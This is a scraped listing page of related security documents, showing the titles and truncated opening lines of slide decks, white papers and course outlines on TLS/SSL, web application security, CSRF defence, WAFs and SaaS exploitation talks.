WHITE PAPER Authentication and Encryption Design Table of Contents Introduction Applications and Services Account Creation Two-step Verification Authentication Passphrase Management Email Message Encryption
More informationDon t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel
Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime
More informationNetworks and Communications MS216 - Course Outline -
Networks and Communications MS216 - Course Outline - Objective Lecturer Times Overall Learning Outcomes Format Programme(s) The objective of this course is to develop in students an understanding of the
More informationData Security and Privacy. Topic 14: Authentication and Key Establishment
Data Security and Privacy Topic 14: Authentication and Key Establishment 1 Announcements Mid-term Exam Tuesday March 6, during class 2 Need for Key Establishment Encrypt K (M) C = Encrypt K (M) M = Decrypt
More informationSo Many Ways to Slap a YoHo: Hacking Facebook & YoVille
Tom Stracener Strace, Contract Engineer MITRE EvilAdamSmith, Sr. Security Consultant Sean Barnum, Cybersecurity Principal MITRE So Many Ways to Slap a YoHo: Hacking Facebook & YoVille Misclaneous Disclaimers
More informationGOING WHERE NO WAFS HAVE GONE BEFORE
GOING WHERE NO WAFS HAVE GONE BEFORE Andy Prow Aura Information Security Sam Pickles Senior Systems Engineer, F5 Networks NZ Agenda: WTF is a WAF? View from the Trenches Example Attacks and Mitigation
More informationTransport Layer Security
CEN585 Computer and Network Security Transport Layer Security Dr. Mostafa Dahshan Department of Computer Engineering College of Computer and Information Sciences King Saud University mdahshan@ksu.edu.sa
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.
1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationSecure Sockets Layer (SSL) / Transport Layer Security (TLS)
Secure Sockets Layer (SSL) / Transport Layer Security (TLS) Brad Karp UCL Computer Science CS GZ03 / M030 20 th November 2017 What Problems Do SSL/TLS Solve? Two parties, client and server, not previously
More informationSecure Frame Communication in Browsers Review
Secure Frame Communication in Browsers Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic being
More informationRunning Remote Code is Risky. Why Study Browser Security. Browser Sandbox. Threat Models. Security User Interface.
CSE 127 Winter 2008 Security Collin Jackson Running Remote Code is Risky Compromise Host Write to file system Interfere with other processes Steal information Read file system Read information associated
More informationSecuring Internet Communication
Securing Internet Communication CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationCIS 5373 Systems Security
CIS 5373 Systems Security Topic 4.3: Network Security SSL/TLS Endadul Hoque Slide Acknowledgment Contents are based on slides from Cristina Nita-Rotaru (Northeastern) Analysis of the HTTPS Certificate
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationSoftware Security. CSC 440/540: Software Engineering Slide #1
Software Security CSC 440/540: Software Engineering Slide #1 Topics 1. Software Security 2. Certifications and Standards 3. Secure Development Life Cycle 4. Web Application Security 5. Secure Communication
More information"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary
Course Summary Description Securing.Net Web Applications - Lifecycle is a lab-intensive, hands-on.net security training course, essential for experienced enterprise developers who need to produce secure.net-based
More informationDisplaying SSL Configuration Information and Statistics
CHAPTER 7 Displaying SSL Configuration Information and Statistics This chapter describes the show commands available for displaying CSS SSL configuration information and statistics and an explanation of
More informationSSL/TLS Deployment Best Practices
Version 1.0 24 Feb 2012 SSL/TLS Deployment Best Practices Ivan Ristic Qualys SSL Labs Introduction SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works... except that it
More informationC1: Define Security Requirements
OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More informationIntroduction to SSL. Copyright 2005 by Sericon Technology Inc.
Introduction to SSL The cornerstone of e-commerce is a Web site s ability to prevent eavesdropping on data transmitted to and from its site. Without this, consumers would justifiably be afraid to enter
More informationPreparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense By Chuck Willis chuck.willis@mandiant.com Presented at Black Hat Briefings DC 2008 on February 20, 2008 Slides available at www.blackhat.com. Abstract:
More informationScan Report Executive Summary
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: Vin65 ASV Company: Comodo CA Limited 11/20/2017 Scan expiration date: 02/18/2018 Part 2. Component
More information